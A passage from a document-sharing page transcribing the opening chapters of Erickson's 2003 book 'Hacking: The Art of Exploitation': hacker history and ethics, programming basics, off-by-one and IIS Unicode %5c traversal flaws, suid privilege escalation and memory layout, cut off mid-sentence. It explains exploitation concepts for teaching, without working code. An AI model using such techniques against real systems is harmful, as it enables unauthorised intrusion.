Hacking: The Art of Exploitation (2003) Jon Erickson PDF
Document Details
Uploaded by Deleted User
2003
Jon Erickson
Tags
Related
- Certified Cybersecurity Technician Information Security Attacks Exam 212-82 PDF
- IoT Security - Introduction to IoT Security PDF
- Computer Hackers PDF
- NPTEL Online Certification Courses: Ethical Hacking Lecture Notes PDF
- Gift of Fire (5th Ed.) Ch 5 - Crime & Security - PDF
- Computer Crime and Threats PDF
Summary
This book, "Hacking: The Art of Exploitation" by Jon Erickson (2003), explores the theory and science behind hacking, providing core techniques and tricks. It teaches readers how to think like a hacker, write their own hacks, or thwart system attacks, including topics like buffer overflows, format strings, shellcode, and network security. The book introduces core programming and networking concepts related to hacking practices.
Full Transcript
Hacking: The Art of Exploitation by Jon Erickson ISBN:1593270070 No Starch Press © 2003 (241 pages) This text introduces the spirit and theory of hacking as well as the science behind it all; it also provides some...
Hacking: The Art of Exploitation by Jon Erickson ISBN:1593270070 No Starch Press © 2003 (241 pages) This text introduces the spirit and theory of hacking as well as the science behind it all; it also provides some core techniques and tricks of hacking so you can think like a hacker, write your own hacks or thwart potential system attacks. Table of Contents Hacking—The Art of Exploitation Preface Ch apt - 0x100—Introduction er 1 Ch apt - 0x200—Programming er 2 Ch apt - 0x300—NETWORKING er 3 Ch apt - 0x400—Cryptology er 4 Ch apt - 0x500—Conclusion er 5 Index Back Cover Hacking is the art of creating problem solving, whether used to find an unconventional solution to a difficult problem or to exploit holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation that a hacker needs to be successful. Hacking: The Art of Exploitation explains things that every real hacker should know. While many hacking books show you how to run other people’s exploits without really explaining the technical details, Hacking: The Art of Exploitation introduces you to the spirit and theory of hacking as well as the science behind it all. By learning some of the core techniques and clever tricks of hacking, you will begin to understand the hacker mindset. Once you learn to think like a hacker, you can write your own hacks and innovate new techniques, or you can thwart potential attacks on your system. In Hacking: The Art of Exploitation you will learn how to: Exploit programs using buffer overflows and format strings Write your own printable ASCII polymorphic shellcode Defeat non-executable stacks by returning into libc Redirect network traffic, conceal open ports, and hijack TCP connections Crack encrypted 802.11b wireless traffic using the FMS attack If you’re serious about hacking, this book is for you, no matter which side of the fence you’re on. About the Author Jon Erickson has a formal education in computer science and speaks frequently at computer security conferences around the world. He currently works as a cryptologist and security specialist in Northern California. Hacking—The Art of Exploitation Jon Erickson NO STARCH PRESS San Francisco HACKING. Copyright © 2003 Jon Erickson. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher. 1 2 3 4 5 6 7 8 9 10 – 06 05 04 03 No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. Publisher: William Pollock Managing Editor: Karol Jurado Cover and Interior Design: Octopod Studios Technical Reviewer: Aaron I. Adams Copyeditor: Kenyon Brown Compositor: Wedobooks Proofreaders: Stephanie Provines, Seth Benson Indexer: Kevin Broccoli For information on translations or book distributors, please contact No Starch Press, Inc. directly: No Starch Press, Inc. 555 De Haro Street, Suite 250, San Francisco, CA 94107 phone: 415-863-9900; fax: 415-863-9950; [email protected]; http://www.nostarch.com The information in this book is distributed on an "As Is" basis, without warranty. While every precaution has been taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it. Library of Congress Cataloguing-in-Publication Data Erickson, Jon (Jon Mark), 1977- Hacking : the art of exploitation / Jon Erickson. p. cm. 1-59327-007-0 1. Computer security. 2. Computer hackers. 3. Computer networks–Security measures. I. Title. QA76.9.A25E72 2003 005.8–dc22 2003017498 ACKNOWLEDGMENTS I would like to thank Bill Pollock, Karol Jurado, Andy Carroll, Leigh Sacks, and everyone else at No Starch Press for making this book a possibility and allowing me so much creative control of the process. Also, I would like to thank my friends Seth Benson and Aaron Adams for proofreading and editing, Jack Matheson for helping me with assembly, Dr. Seidel for keeping me interested in the science of computer science, my parents for buying that first Commodore Vic-20, and the hacker community for their innovation and creativity that produced the techniques explained in this book. Preface This book explains the details of various hacking techniques, many of which get very technical. While the fundamental programming concepts that these hacking techniques build from are introduced in the book, general programming knowledge will certainly aid the reader in understanding these concepts. The code examples in this book were done on an x86-based computer running Linux. Having a similarly set-up computer to follow along is encouraged; this will let you see the results for yourself and allow you to experiment and try new things. This is what hacking is all about. Gentoo Linux was the distribution that was used in this book, and is available at http://www.gentoo.org. Chapter 1: 0x100—Introduction The idea of hacking may conjure up stylized images of electronic vandalism, espionage, dyed hair, and body piercings. Most people associate hacking with breaking the law, therefore dubbing all those who engage in hacking activities to be criminals. Granted, there are people out there who use hacking techniques to break the law, but hacking isn't really about that. In fact, hacking is more about following the law than breaking it. The essence of hacking is finding unintended or overlooked uses for the laws and properties of a given situation and then applying them in new and inventive ways to solve a problem. The problem could be the lack of access to a computer system or figuring out a way to make old phone equipment control a model railroad system. Usually, the hacked solutions solve these problems in unique ways, unimaginable by those confined to conventional methodology. In the late 1950s, the MIT model railroad club was given a donation of parts, most of which were old telephone equipment. The members used this equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing into the appropriate section. They called this new and inventive use of equipment "hacking", and many consider this group to be the original hackers. They moved on to programming on punchcards and ticker tape for early computers like the IBM 704 and the TX-0. While others were content with just writing programs that solved problems, the early hackers were obsessed with writing programs that solved problems well. A program that could achieve the same result using fewer punchcards was considered better, even though it did the same thing. The key difference was how the program achieved its results—elegance. Being able to reduce the number of punchcards needed for a program showed an artistic mastery over the computer, which was admired and appreciated by those who understood it. Analogously, a block of wood might solve the problem of supporting a vase, but a nicely crafted table built using refined techniques sure looks a lot better. The early hackers were transforming programming from an engineering task into an art form, which, like many forms of art, could only be appreciated by those who got it and would be misunderstood by those who didn't. This approach to programming created an informal subculture, separating those who appreciated the beauty of hacking from those who were oblivious to it. This subculture was intensely focused on learning more and gaining yet higher levels of mastery over their art. They believed that information should be free, and anything that stood in the way of that freedom should be circumvented. Such obstructions included authority figures, the bureaucracy of college classes, and discrimination. In a sea of graduation-driven students, this unofficial group of hackers defied the conventional goals of getting good grades, instead pursuing knowledge itself. This drive to continuously learn and explore transcended even the conventional boundaries drawn by discrimination, evident in the group's acceptance of 12-year-old Peter Deutsch when he demonstrated his knowledge of the TX-0 and his desire to learn. Age, race, gender, appearance, academic degrees, and social status were not primary criteria for judging another's worth—this was not because of a desire for equality, but because of a desire to advance the emerging art of hacking. The hackers found splendor and elegance in the conventionally dry sciences of math and electronics. They saw programming as a form of artistic expression, and the computer was the instrument of their art. Their desire to dissect and understand wasn't intended to demystify artistic endeavors, but was simply a way to achieve a greater appreciation of them. These knowledge-driven values would eventually be called the Hacker Ethic: the appreciation of logic as an art form, and the promotion of the free flow of information, surmounting conventional boundaries and restrictions, for the simple goal of better understanding the world. This is not new; the Pythagoreans in ancient Greece had a similar ethic and subculture, despite the lack of computers. They saw beauty in mathematics and discovered many core concepts in geometry. That thirst for knowledge and its beneficial by-products would continue on through history, from the Pythagoreans to Ada Lovelace to Alan Turing to the hackers of the MIT model railroad club. The progression of computational science would continue even further, through to Richard Stallman and Steve Wozniak. These hackers have brought us modern operating systems, programming languages, personal computers, and many other technological advances that are used every day. So how does one distinguish between the good hackers who bring us the wonders of technological advancement and the evil hackers who steal our credit card numbers? Once, the term cracker was coined to refer to the evil hackers and distinguish them from the good ones. The journalists were told that crackers were supposed to be the bad guys, while hackers were the good guys. The hackers stayed true to the Hacker Ethic, while crackers were only interested in breaking the law. Crackers were considered to be much less talented than the elite hackers, simply making use of hacker-written tools and scripts without understanding how they worked. Cracker was meant to be the catch-all label for anyone doing anything unscrupulous with a computer — pirating software, defacing websites, and worst of all, not understanding what they were doing. But very few people use this term today. The term's lack of popularity might be due to a collision of definitions — the term cracker was originally used to describe those who crack software copyrights and reverse engineer copy protection schemes. Or it might simply be due to its new definition, which refers both to a group of people that engage in illegal activity with computers and to people who are relatively unskilled hackers. Few journalists feel compelled to write about an unskilled group using a term (crackers) that most people are unfamiliar with. In contrast, most people are aware of the mystery and skill associated with the term hackers. For a journalist, the decision to use the term crackers or hackers seems easy. Similarly, the term script kiddie is sometimes used to refer to crackers, but it just doesn't have the same sensational journalistic zing of the shadowy hacker. There are some who will still argue that there is a distinct line between hackers and crackers, but I believe that anyone who has the hacker spirit is a hacker, despite what laws he or she may break. This unclear hacker versus cracker line is even further blurred by the modern laws restricting cryptography and cryptographic research. In 2001, Professor Edward Felten and his research team from Princeton University were about to publish the results of their research — a paper that discussed the weaknesses of various digital watermarking schemes. This paper was in response to a challenge issued by the Secure Digital Music Initiative (SDMI) in the SDMI Public Challenge, which encouraged the public to attempt to break these watermarking schemes. Before they could publish the paper, though, they were threatened by both the SDMI Foundation and the Recording Industry Association of America (RIAA). Apparently the Digital Millennium Copyright Act (DMCA) of 1998 makes it illegal to discuss or provide technology that might be used to bypass industry consumer controls. This same law was used against Dmitry Sklyarov, a Russian computer programmer and hacker. He had written software to circumvent overly simplistic encryption in Adobe software and presented his findings at a hacker convention in the United States. The FBI swooped in and arrested him, leading to a lengthy legal battle. Under the law, the complexity of the industry consumer controls don't matter — it would be technically illegal to reverse engineer or even discuss Pig Latin if it were used as an industry consumer control. So who are the hackers and who are the crackers now? When laws seem to interfere with free speech, do the good guys who speak their minds suddenly become bad? I believe that the spirit of the hacker transcends governmental laws, as opposed to being defined by them. And as in any knowledgeable group, there will always be some bad people who use this knowledge to conduct bad acts. The sciences of nuclear physics and biochemistry can be used to kill, yet they also provide us with significant scientific advancement and modern medicine. There's nothing good or bad about the knowledge itself; the morality lies in the application of that knowledge. Even if we wanted to, we couldn't suppress the knowledge of how to convert matter into energy or stop the continual technological progress of society. In the same way, the hacker spirit can never be stopped, nor can it be easily categorized or dissected. Hackers will constantly be pushing the limits, forcing us to explore further and further. Unfortunately, there are many so-called hacker books that are nothing more than compendiums of other people's hacks. They instruct the reader to use the tools on the included CD without explaining the theory behind those tools, producing someone skilled in using other people's tools, yet incapable of understanding those tools or creating tools of their own. Perhaps the cracker and script kiddie terms aren't entirely outmoded. The real hackers are the pioneers, the ones who devise the methods and create the tools that are packed on those aforementioned CDs. Putting legality aside and thinking logically, every exploit that a person could possibly read about in a book has a corresponding patch to defend against it. A properly patched system should be immune to this class of attack. Attackers who only use these techniques without innovation are doomed to prey only on the weak and the stupid. The real hackers can proactively find holes and weaknesses in software to create their own exploits. If they choose not to disclose these vulnerabilities to a vendor, hackers can use those exploits to wander unobstructed through fully patched and "secure" systems. So if there aren't any patches, what can be done to prevent hackers from finding new holes in software and exploiting them? This is why security research teams exist—to try to find these holes and notify vendors before they are exploited. There is a beneficial co-evolution occurring between the hackers securing systems and those breaking into them. This competition provides us with better and stronger security, as well as more complex and sophisticated attack techniques. The introduction and progression of intrusion detection systems (IDSs) is a prime example of this co-evolutionary process. The defending hackers create IDSs to add to their arsenal, while the attacking hackers develop IDS evasion techniques, which are eventually compensated for in bigger and better IDS products. The net result of this interaction is positive, as it produces smarter people, improved security, more stable software, inventive problem-solving techniques, and even a new economy. The intent of this book is to teach you about the true spirit of hacking. We will look at various hacker techniques, from the past through to the present, dissecting them to learn how they work and why they work. By presenting the information in this way, you will gain an understanding and appreciation for hacking that may inspire you to improve upon existing techniques or even to invent brand-new ones. I hope this book will stimulate the curious hacker nature in you and prompt you to contribute to the art of hacking in some way, regardless of which side of the fence you choose to be on. Chapter 2: 0x200—Programming Overview Hacking is a term used both by those who write code and those who exploit it. Even though these two groups of hackers have different end goals, both groups use similar problem-solving techniques. And because an understanding of programming helps those who exploit, and an understanding of exploitation helps those who program, many hackers do both. There are interesting hacks found in both the techniques used to write elegant code and the techniques used to exploit programs. Hacking is really just the act of finding a clever and counterintuitive solution to a problem. The hacks found in program exploits usually deal with using the rules of the computer in ways never intended, to achieve seemingly magical results, which are usually focused on bypassing security. The hacks found in the writing of programs are similar, in that they also use the rules of the computer in new and inventive ways, but the final goal tends to be achieving the most impressive and best possible way to accomplish a given task. There is actually an infinite number of programs that can be written to accomplish any given task, but most of these solutions are unnecessarily large, complex, and sloppy. The few solutions that remain are small, efficient, and neat. This particular quality of a program is called elegance, and the clever and inventive solutions that tend to lead to this efficiency are called hacks. Hackers on both sides of programming tend to appreciate both the beauty of elegant code and the ingenuity of clever hacks. Because of the sudden growth of computational power and the temporary dot-com economic bubble, less importance has been put on clever hacks and elegant code, and more importance has been placed on churning out functional code as quickly and cheaply as possible. Spending an extra five hours to create a slightly faster and more memory-efficient piece of code just doesn't make business sense when that increase in speed and memory only turns out to be a few milliseconds on modern consumer processors and less than a single percent of savings in the hundreds of millions of bytes of memory most modern computers have available. When the bottom line is money, spending time on clever hacks for optimization just doesn't make sense. True appreciation of programming elegance is left for the hackers: computer hobbyists whose end goal isn't to make a profit, but just to squeeze every bit of functionality out of their old Commodore 64 that they possibly can; exploit writers who need to write tiny and amazing pieces of code to slip through narrow security cracks; and anyone else who appreciates the pursuit and the challenge of finding the best possible solution. These are the people who get excited about programming and really appreciate the beauty of an elegant piece of code or the ingenuity of a clever hack. Because an understanding of programming is a prerequisite to understanding how programs can be exploited, programming makes a natural starting point. 0x210 What Is Programming? Programming is a very natural and intuitive concept. A program is nothing more than a series of statements written in a specific language. Programs are everywhere, and even the technophobes of the world use programs every day. Driving directions, cooking recipes, football plays, and DNA are all programs that exist in the lives and even the cellular makeup of people everywhere. A typical "program" for driving directions might look something like this: Start out down Main Street headed east. Continue on Main until you see a church on your right. If the street is blocked because of construction, turn right there at 15th street, turn left on Pine Street, and then turn right on 16th street. Otherwise, you can just continue and make a right on 16th street. Continue on 16th street and turn left onto Destination Road. Drive straight down Destination Road for 5 miles and then the house is on the right. The address is 743 Destination Road. Anyone who knows English can understand and follow these driving directions; they're written in English. Granted, they're not eloquent, but each instruction is clear and easy to understand, at least for someone who reads English. But a computer doesn't natively understand English; it only understands machine language. To instruct a computer to do something, the instructions must be written in its language. However, machine language is arcane and difficult to work with. Machine language consists of raw bits and bytes, and it differs from architecture to architecture. So to write a program in machine language for an Intel x86 processor, one would have to figure out the value associated with each instruction, how each instruction interacts, and a myriad of other low-level details. Programming like this is painstaking and cumbersome, and it is certainly not intuitive. What's needed to overcome the complication of writing machine language is a translator. An assembler is one form of machine-language translator: It is a program that translates assembly language into machine-readable code. Assembly language is less cryptic than machine language, because it uses names for the different instructions and variables, instead of just using numbers. However assembly language is still far from intuitive. The instruction names are very esoteric and the language is still architecture-specific. This means that just as machine language for Intel x86 processors is different from machine language for Sparc processors, x86 assembly language is different from Sparc assembly language. Any program written using assembly language for one processor's architecture will not work in another processor's architecture. If a program is written in x86 assembly language, it must be rewritten to run on Sparc architecture. In addition, to write an effective program in assembly language, one must still know many low-level details of that processor's architecture. These problems can be mitigated by yet another form of translator called a compiler. A compiler converts a high-level language into machine language. High-level languages are much more intuitive than assembly language and can be converted into many different types of machine language for different processor architectures. This means that if a program is written in a high-level language, the program only needs to be written once, and the same piece of program code can be compiled by a compiler into machine language for various specific architectures. C, C++, and FORTRAN are all examples of high-level languages. A program written in a high-level language is much more readable and English-like than assembly language or machine language, but it still must follow very strict rules about how the instructions are worded or the compiler won't be able to understand it. Programmers have yet another form of programming language called pseudo-code. Pseudo-code is simply English arranged with a general structure similar to a high-level language. It isn't understood by compilers, assemblers, or any computers, but it is a useful way for a programmer to arrange instructions. Pseudo-code isn't well defined. In fact, many people write pseudo-code slightly differently. It's sort of the nebulous missing link between natural languages, such as English, and high-level programming languages, such as C. The driving directions from before, converted into pseudo-code, might look something like this: Begin going east on Main street; Until (there is a church on the right) { Drive down Main; } If (street is blocked) { Turn(right, 15th street); Turn(left, Pine street); Turn(right, 16th street); } else { Turn(right, 16th street); } Turn(left, Destination Road); For (5 iterations) { Drive straight for 1 mile; } Stop at 743 Destination Road; Each instruction is broken down into its own line, and the control logic of the directions has been broken down into control structures. Without control structures, a program would just be a series of instructions executed in sequential order. But our driving directions weren't that simple. They included statements like, "Continue on Main until you see a church on your right" and "If the street is blocked because of construction …." These are known as control structures, and they change the flow of the program's execution from a simple sequential order to a more complex and more useful flow. In addition, the instructions to turn the car are much more complicated than just "Turn right on 16th street." Turning the car might involve locating the correct street, slowing down, turning on the blinker, turning the steering wheel, and finally speeding back up to the speed of traffic on the new street. Because many of these actions are the same for any street, they can be put into a function. A function takes in a set of arguments as input, processes its own set of instructions based on the input, and then returns back to where it was originally called. A turning function in pseudo-code might look something like this: Function Turn(the_direction, the_street) { locate the_street; slow down; if(the_direction == right) { turn on the right blinker; turn the steering wheel to the right; } else { turn on the left blinker; turn the steering wheel to the left; } speed back up } By using this function repeatedly, the car can be turned on any street, in any direction, without having to write out every little instruction each time. The important thing to remember about functions is that when they are called the program execution actually jumps over to a different place to execute the function and then returns back to where it left off after the function finishes executing. One final important point about functions is that each function has its own context. This means that the local variables found within each function are unique to that function. Each function has its own context, or environment, which it executes within. The core of the program is a function, itself, with its own context, and as each function is called from this main function, a new context for the called function is created within the main function. If the called function calls another function, a new context for that function is created within the previous function's context, and so on. This layering of functional contexts allows each function to be somewhat atomic. The control structures and functional concepts found in pseudo-code are also found in many different programming languages. Pseudo-code can look like anything, but the preceding pseudo-code was written to resemble the C programming language. This resemblance is useful, because C is a very common programming language. In fact, the majority of Linux and other modern implementations of Unix operating systems are written in C. Because Linux is an open source operating system with easy access to compilers, assemblers, and debuggers, this makes it an excellent platform to learn from. For the purposes of this book, the assumption will be made that all operations are occurring on an x86-based processor running Linux. 0x220 Program Exploitation Program exploitation is a staple of hacking. Programs are just a complex set of rules following a certain execution flow that ultimately tell the computer what to do. Exploiting a program is simply a clever way of getting the computer to do what you want it to do, even if the currently running program was designed to prevent that action. Because a program can really only do what it's designed to do, the security holes are actually flaws or oversights in the design of the program or the environment the program is running in. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the product of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places. A program can only do what it's programmed to do, to the letter of the law. Unfortunately, what's written doesn't always coincide with what the programmer intended the program to do. This principle can be explained with a joke: A man is walking through the woods, and he finds a magic lamp on the ground. Instinctively, he picks the lamp up and rubs the side of it with his sleeve, and out pops a genie. The genie thanks the man for freeing him and offers to grant him three wishes. The man is ecstatic and knows exactly what he wants. "First", says the man, "I want a billion dollars." The genie snaps his fingers, and a briefcase full of money materializes out of thin air. The man is wide-eyed in amazement and continues, "Next, I want a Ferrari." The genie snaps his fingers, and a Ferrari appears from a puff of smoke. The man continues, "Finally, I want to be irresistible to women." The genie snaps his fingers, and the man turns into a box of chocolates. Just as the man's final wish was granted based on what he said, rather than what he was thinking, a program will follow its instructions exactly, and the results aren't always what the programmer intends. Sometimes they can lead to catastrophic results. Programmers are human, and sometimes what they write isn't exactly what they mean. For example, one common programming error is called an off-by-one error. As the name implies, it's an error where the programmer has miscounted by one. This happens more often than one would think, and it is best illustrated with a question: If you're building a 100 foot fence, with fence posts spaced 10 feet apart, how many fence posts do you need? The obvious answer is 10 fence posts, but this is incorrect, because 11 fence posts are actually needed. This type of off-by-one error is commonly called a fencepost error, and it occurs when a programmer mistakenly counts items instead of spaces between items, or vice versa. Another example is when a programmer is trying to select a range of numbers or items for processing, such as items N through M. If N = 5 and M = 17, how many items are there to process? The obvious answer is M ? N, or 17 ? 5 = 12 items. But this is incorrect, because there are actually M ? N + 1 items, for a total of 13 items. This may seem counterintuitive at first glance, because it is, and that's exactly how these errors happen. Often these fencepost errors go unnoticed because the programs aren't tested for every single possibility, and their effects don't generally occur during normal program execution. However, when the program is fed the input that makes the effects of the error manifest, the consequences of the error can have an avalanche effect on the rest of the program logic. When properly exploited, an off-by-one error can cause a seemingly secure program to become a security vulnerability. One recent example of this is OpenSSH, which is meant to be a secure terminal communication program suite, designed to replace insecure and unencrypted services such as telnet, rsh, and rcp. However there was an off-by-one error in the channel allocation code that was heavily exploited. Specifically, the code included an if statement that read: if (id < 0 || id > channels_alloc) { It should have been: if (id < 0 || id >= channels_alloc) { In plain English, the code read, "If the ID is less than 0 or the ID is greater than the channels allocated, do the following stuff", when it should have been, "If the ID is less than 0 or the ID is greater than or equal to the channels allocated, do the following stuff." This simple off-by-one error allowed further exploitation of the program, so that a normal user authenticating and logging in could gain full administrative rights to the system. This type of functionality certainly wasn't what the programmers had intended for a secure program like OpenSSH, but a computer can only do what it's told, even if those instructions aren't necessarily what was intended. Another situation that seems to breed exploitable programmer errors is when a program is quickly modified to expand its functionality. While this increase in functionality makes the program more marketable and increases its value, it also increases the program's complexity, which increases the chances of an oversight. Microsoft's IIS web server program is designed to serve up static and interactive web content to users. In order to accomplish this, the program must allow users to read, write, and execute programs and files within certain directories; however, this functionality must be limited to those certain directories. Without this limitation, users would have full control of the system, which is obviously undesirable from a security perspective. To prevent this situation, the program has path-checking code designed to prevent users from using the backslash character to traverse backward through the directory tree and enter other directories. With the addition of support for the Unicode character set, though, the complexity of the program continued to increase. Unicode is a double-byte character set designed to provide characters for every language, including Chinese and Arabic. By using two bytes for each character instead of just one, Unicode allows for tens of thousands of possible characters, as opposed to the few hundred allowed by single byte characters. This additional complexity meant that there were now multiple representations of the backslash character. For example, %5c in Unicode translates to the backslash character, but this translation was done after the path-checking code had run. So by using %5c instead of \, it was indeed possible to traverse directories, allowing the aforementioned security dangers. Both the Sadmind worm and the Code-Red worm used this type of Unicode conversion oversight to deface web pages. Another related example of this letter of the law principal, used outside the realm of computer programming, is known as the "LaMacchia Loophole." Just like the rules of a computer program, the U.S. legal system sometimes has rules that don't say exactly what was intended. Like a computer program exploit, these legal loopholes can be used to sidestep the intent of the law. Near the end of 1993, a 21-year-old computer hacker and student at MIT named David LaMacchia set up a bulletin board system called "Cynosure" for the purposes of software piracy. Those who had software to give would upload it, and those who didn't would download it. The service was only online for about six weeks, but it generated heavy network traffic worldwide, which eventually attracted the attention of university and federal authorities. Software companies claimed that they lost one million dollars as a result of Cynosure, and a federal grand jury charged LaMacchia with one count of conspiring with unknown persons to violate the wire-fraud statute. However, the charge was dismissed because what LaMacchia was alleged to have done wasn't criminal conduct under the Copyright Act, since the infringement was not for the purpose of commercial advantage or private financial gain. Apparently, the lawmakers had never anticipated that someone might engage in these types of activities with a motive other than personal financial gain. Later, in 1997, Congress closed this loophole with the No Electronic Theft Act. Even though this example doesn't involve the exploiting of a computer program, the judges and courts can be thought of as computers executing the program of the legal system as it was written. The abstract concepts of hacking transcend computing and can be applied to many other aspects of life involving complex systems. 0x230 Generalized Exploit Techniques Off-by-one errors and improper Unicode expansion are all mistakes that can be hard to see at the time but are glaringly obvious to any programmer in hindsight. However, there are some common mistakes that can be exploited in ways that aren't so obvious. The impact of these mistakes on security isn't always apparent, and these security problems are found in code everywhere. Because the same type of mistake is made in many different places, generalized exploit techniques have evolved to take advantage of these mistakes, and they can be used in a variety of situations. The two most common types of generalized exploit techniques are buffer-overflow exploits and format-string exploits. With both of these techniques, the ultimate goal is to take control of the target program's execution flow to trick it into running a piece of malicious code that can be smuggled into memory in a variety of ways. This is known as execution of arbitrary code, because the hacker can cause a program to do pretty much anything. But what really makes these types of exploits interesting are the various clever hacks that have evolved along the way to achieve the impressive final results. An understanding of these techniques is far more powerful than the end result of any single exploit, as they can be applied and extended to create a plethora of other effects. However, a prerequisite to understanding these exploit techniques is a much deeper knowledge of file permissions, variables, memory allocation, functions, and assembly language. 0x240 Multi-User File Permissions Linux is a multi-user operating system, in which full system privileges are solely invested in an administrative user called "root." In addition to the root user, there are many other user accounts and multiple groups. Many users can belong to one group, and one user can belong to many different groups. The file permissions are based on both users and groups, so that other users can't read your files unless they are explicitly given permission. Each file is associated to a user and a group, and permissions can be given out by the owner of the file. The three permissions are read, write , and execute, and they can be turned on or off in three fields: user, group, and other. The user field specifies what the owner of the file can do (read, write, or execute), the group field specifies what users in that group can do, and the other field specifies what everyone else can do. These permissions are displayed using the letters r, w, and x, in three sequential fields corresponding to user, group, and other. In the following example, the user has read and write permissions (the first bold field), the group has read and execute permissions (the middle field), and other has write and execute permissions (the last bold field). -rw-r-x-wx 1 guest visitors 149 Jul 15 23:59 tmp In some situations there is a need to allow a non-privileged user to perform a system function that requires root privileges, such as changing a password. One possible solution is to give the user root privileges; however, this also gives the user complete control over the system, which is generally bad from a security perspective. Instead, the program is given the ability to run as if it were the root user, so that the system function can be carried out properly and the user isn't actually given full system control. This type of permission is called the suid (set user ID) permission or bit. When a program with the suid permission is executed by any user, that user's euid (effective user ID) is changed to the uid of the program's owner, and the program is executed. After the program execution completes, the user's euid is changed back to its original value. This bit is denoted by the s in bold in the following file listing. There is also a sgid (set group ID) permission, which does the same thing with the effective group ID. -rwsr-xr-x 1 root root 29592 Aug 8 13:37 /usr/bin/passwd For example, if a user wanted to change her password, she would run /usr/bin/passwd, which is owned by root and has the suid bit on. The uid would then be changed to root's uid (which is 0) for the execution of passwd, and it would be switched back after the execution completes. Programs that have the suid permission turned on and that are owned by the root user are typically called suid root programs. This is where changing the flow of program execution becomes very powerful. If the flow of a suid root program can be changed to execute an injected piece of arbitrary code, then the attacker could get the program to do anything as the root user. If the attacker decides to cause a suid root program to spawn a new user shell that she can access, the attacker will have root privileges at a user level. As mentioned earlier, this is generally bad from a security perspective, as it gives the attacker full control of the system as the root user. I know what you're thinking: "That sounds amazing, but how can the flow of a program be changed if a program is a strict set of rules?" Most programs are written in high-level languages, such as C, and when working in this higher level, the programmer doesn't always see the bigger picture, which involves variable memory, stack calls, execution pointers, and other low-level machine commands that aren't as apparent in the high-level language. A hacker with an understanding of the low-level machine commands that the high-level program compiles into will have a better understanding of the actual execution of the program than the high-level programmer who wrote it without that understanding. So hacking to change the execution flow of a program still isn't actually breaking any of the program rules; it's just knowing more of the rules and using them in ways never anticipated. To carry out these methods of exploitation, and to write programs to prevent these types of exploits, requires a greater understanding of the lower-level programming rules, such as program memory. 0x250 Memory Memory might seem intimidating at first, but remember that a computer isn't magical, and at the core it's really just a giant calculator. Memory is just bytes of temporary storage space that are numbered with addresses. This memory can be accessed by its addresses, and the byte at any particular address can be read from or written to. Current Intel x86 processors use a 32-bit addressing scheme, which means there are 232, or 4,294,967,296 possible addresses. A program's variables are just certain places in memory that are used to store information. Pointers are a special type of variable used to store addresses of memory locations to reference other information. Because memory cannot actually be moved, the information in it must be copied. However, it can be computationally expensive to copy large chunks of memory around to be used by different functions or in different places. This is also expensive from a memory standpoint, because a new block of memory must be allocated for the copy destination before the source can be copied. Pointers are a solution to this problem. Instead of copying the large block of memory around, a pointer variable is assigned the address of that large memory block. Then this small 4-byte pointer can then be passed around to the various functions that need to access the large memory block. The processor has its own special memory, which is relatively small. These portions of memory are called registers, and there are some special registers that are used to keep track of things as a program executes. One of the most notable is the extended instruction pointer (EIP). The EIP is a pointer that holds the address of the currently executing instruction. Other 32-bit registers that are used as pointers are the extended base pointer (EBP) and the extended stack pointer (ESP). All three of these registers are important to the execution of a program and will be explained in more depth later. 0x251 Memory Declaration When programming in a high-level language, like C, variables are declared using a data type. These data types can range from integers to characters to custom user-defined structures. One reason this is necessary is to properly allocate space for each variable. An integer needs to have 4 bytes of space, while a character only needs a single byte. This means that an integer has 32 bits of space (4,294,967,296 possible values), while a character has only 8 bits of space (256 possible values). In addition, variables can be declared in arrays. An array is just a list of N elements of a specific data type. So a 10-character array is simply 10 adjacent characters located in memory. An array is also referred to as a buffer, and a character array is also referred to as a string. Because copying large buffers around is very computationally expensive, pointers are often used to store the address of the beginning of the buffer. Pointers are declared by prepending an asterisk to the variable name. Here are some examples of variable declarations in C: int integer_variable; char character_variable; char character_array; char *buffer_pointer; One important detail of memory on x86 processors is the byte order of 4-byte words. The ordering is known as little endian, meaning that the least significant byte is first. Ultimately, this means that the bytes are stored in memory in reverse for 4-byte words, such as integers and pointers. The hexadecimal value 0x12345678 stored in little endian would look like 0x78563412 in memory. Even though compilers for high-level languages such as C will account for the byte ordering automatically, this is an important detail to remember. 0x252 Null Byte Termination Sometimes a character array will have ten bytes allocated to it, but only four bytes will actually be used. If the word "test" is stored in a character array with ten bytes allocated for it, there will be extra bytes at the end that aren't needed. A zero, or null byte, delimiter is used to terminate the string and tell any function that is dealing with the string to stop operations there. 0 1 2 3 4 5 6 7 8 9 t e s t 0 X X X X X So a function that copies the above string from this character buffer to a different location would only copy "test", stopping at the null byte, instead of copying the entire buffer. Similarly, a function that prints the contents of a character buffer would only print the word "test", instead of printing out "test" followed by several random bytes of data that might be found afterward. Terminating strings with null bytes increases efficiency and allows display functions to work more naturally. 0x253 Program Memory Segmentation Program memory is divided into five segments: text, data, bss, heap, and stack. Each segment represents a special portion of memory that is set aside for a certain purpose. The text segment is also sometimes called the code segment. This is where the assembled machine language instructions of the program are located. The execution of instructions in this segment is non-linear, thanks to the aforementioned high-level control structures and functions, which compile into branch, jump, and call instructions in assembly language. As a program executes, the EIP is set to the first instruction in the text segment. The processor then follows an execution loop that does the following: 1. Read the instruction that EIP is pointing to. 2. Add the byte-length of the instruction to EIP. 3. Execute the instruction that was read in step 1. 4. Go to step 1. Sometimes the instruction will be a jump or a call instruction, which changes the EIP to a different address of memory. The processor doesn't care about the change, because it's expecting the execution to be non-linear anyway. So if the EIP is changed in step 3, the processor will just go back to step 1 and read the instruction found at the address of whatever the EIP was changed to. Write permission is disabled in the text segment, as it is not used to store variables, only code. This prevents people from actually modifying the program code, and any attempt to write to this segment of memory will cause the program to alert the user that something bad happened and kill the program. Another advantage of this segment being read-only is that it can be shared between different copies of the program, allowing multiple executions of the program at the same time without any problems. It should also be noted that this memory segment has a fixed size, because nothing ever changes in it. The data and bss segments are used to store global and 